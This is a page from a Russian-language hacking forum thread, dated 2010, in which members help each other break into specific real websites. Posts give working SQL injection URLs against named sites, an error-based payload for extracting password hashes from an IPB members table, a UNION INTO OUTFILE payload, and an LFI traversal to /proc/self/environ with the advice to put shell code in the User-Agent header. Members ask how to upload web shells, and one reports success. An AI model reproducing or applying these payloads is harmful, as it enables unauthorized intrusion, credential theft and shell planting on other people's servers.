Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    :D другого ответа я не ожидал))
     
  2. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    вот еще одна гимморная скуль:

    http://www.caffmoscommunity.com/show_review.asp?rid=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

    а вот вывести имя второй таблицы уже проблема
     
  3. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Еще 15 минут назад сам не знал. но использовал гугл :)
    http://www.caffmoscommunity.com/show_review.asp?rid=%28SELECT+TABLE_NAME+FROM+%20INFORMATION_SCHEMA.TABLES%20for%20xml%20raw%29--

    Информацию получил с http://raz0r.name/obzory/select-for-xml-sql-injection/
     
    #13903 Train, 2 Jul 2010
    Last edited: 2 Jul 2010
    2 people like this.
  4. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    как быть тут?
    http://fixwap.net/ru/html/complain.php?uid=-1%20OR%2017-7=10
     
  5. #Wolf#

    #Wolf# Elder - Старейшина

    Joined:
    26 Mar 2008
    Messages:
    375
    Likes Received:
    166
    Reputations:
    16
    Нуждаюсь в помощис флуром.
    типо самописный модуль для ipb 1.31
    урл засветить к сожалению не могу.
    запрос возвращающий юзера:
    result:
    пробую выбирать из таблы:
    и получаю:
    :confused:
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    #Wolf# попробуй зачарить
     
    _________________________
  7. #Wolf#

    #Wolf# Elder - Старейшина

    Joined:
    26 Mar 2008
    Messages:
    375
    Likes Received:
    166
    Reputations:
    16
    :( ...
     
  8. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Таблы хексить нельзя...
     
  9. #Wolf#

    #Wolf# Elder - Старейшина

    Joined:
    26 Mar 2008
    Messages:
    375
    Likes Received:
    166
    Reputations:
    16
    все равно не работает, уже все перепробовал.
     
  10. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    эм =\
     
  11. #Wolf#

    #Wolf# Elder - Старейшина

    Joined:
    26 Mar 2008
    Messages:
    375
    Likes Received:
    166
    Reputations:
    16
    спасибо, но
    символ "_" не пускает?
     
    #13911 #Wolf#, 2 Jul 2010
    Last edited: 2 Jul 2010
  12. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Странно, ведь information_schema пропустил же.
     
    2 people like this.
  13. #Wolf#

    #Wolf# Elder - Старейшина

    Joined:
    26 Mar 2008
    Messages:
    375
    Likes Received:
    166
    Reputations:
    16
    да, вот что заметил, нормально могу читать все таблы, кроме тех, который начинаются на ibf_ .
    Хотя структуру их я могу смотреть, а "get data" нет =(
    есть мысли?
     
  14. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    #Wolf#, попробуй -

    Code:
    id=201255656844 and(select 1 from(select count(*),concat((select converge_pass_hash from `ibf_members_converge` limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
    -------------------

    Как вариант, можно регнуться, залить аватар с пхп кодом и проинклудить. Или инклудь логи, подробнее тут

    _http://www.stolarzowice.info/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../proc/self/environ%00

    в User-Agent пишешь код шелла.

    -------------------

    http://fixwap.net/ru/html/complain.php?uid=26300+and+mid(version(),1,1)=4 -> false
    http://fixwap.net/ru/html/complain.php?uid=26300+and+mid(version(),1,1)=5 -> true
     
    #13914 .:[melkiy]:., 2 Jul 2010
    Last edited: 2 Jul 2010
    2 people like this.
  15. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Скажите как можно залить шелл через LFI?
    Вот например тут
    И какие нужны права на это?
     
  16. #Wolf#

    #Wolf# Elder - Старейшина

    Joined:
    26 Mar 2008
    Messages:
    375
    Likes Received:
    166
    Reputations:
    16
    нет такой таблицы. версия 1.3.1
     
  17. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Как правильно составить двойной запрос?
    PHP:

    function recordcount_new($ps_sql){
        global 
    $conn_s;    
        
    $rs_s2 mysql_query("select COUNT(CODE) as count1 from ".$ps_sql,$conn_s);
            
    $rs_s=mysql_fetch_array($rs_s2);
            
    $pi_recordcount $rs_s['count1'];
        
    mysql_free_result($rs_s2);
        if (
    $pi_recordcount==""$pi_recordcount=0;
    return 
    $pi_recordcount;
    }
    PHP:
    $rs_2 mysql_query("select * from tbl_subkat where KATCODE=".$GET['id']." order by POSITION, NAZV",$conn1);
    while ((
    $rs=mysql_fetch_assoc($rs_2))!==false) {

    $pi2=recordcount_new("tbl_base where ISMODER=1 and (SUBKAT1=".$rs['CODE']." or SUBKAT2=".$rs['CODE']." or SUBKAT3=".$rs['CODE'].")");
                                                                  
    if (
    $pi2>0) echo ' <i>('.$pi2.')</i>';

    }

    -1+UniON+SelEcT+1+into+outfile+'1.txt'-- = 0x2d312b556e694f4e2b53656c4563542b312b696e746f2b6f757466696c652b5c27312e7478745c272d2d

    http://site.ru/kat.php?id=-1+UnioN+SeELcT+0x2d312b556e694f4e2b53656c4563542b312b696e746f2b6f757466696c652b5c27312e7478745c272d2d,2,version(),4--
    :confused:
     
    #13917 SeNaP, 2 Jul 2010
    Last edited: 2 Jul 2010
  18. Farboud

    Farboud New Member

    Joined:
    10 Jun 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Имеется доступ фтп к серверу (Topserver),
    как узнать директорию доступную на запись (или поменять права на запись) и залить шел
    если можно попобробней, а то я в этом не особо опытный!
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    чет не понял...есть фтп доступ и нет прав на заливку? чет нереально
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Спасибо, классный инклуд.
    Я зашеллил ;)
    Подсказка: енвирон
     
Thread Status:
Not open for further replies.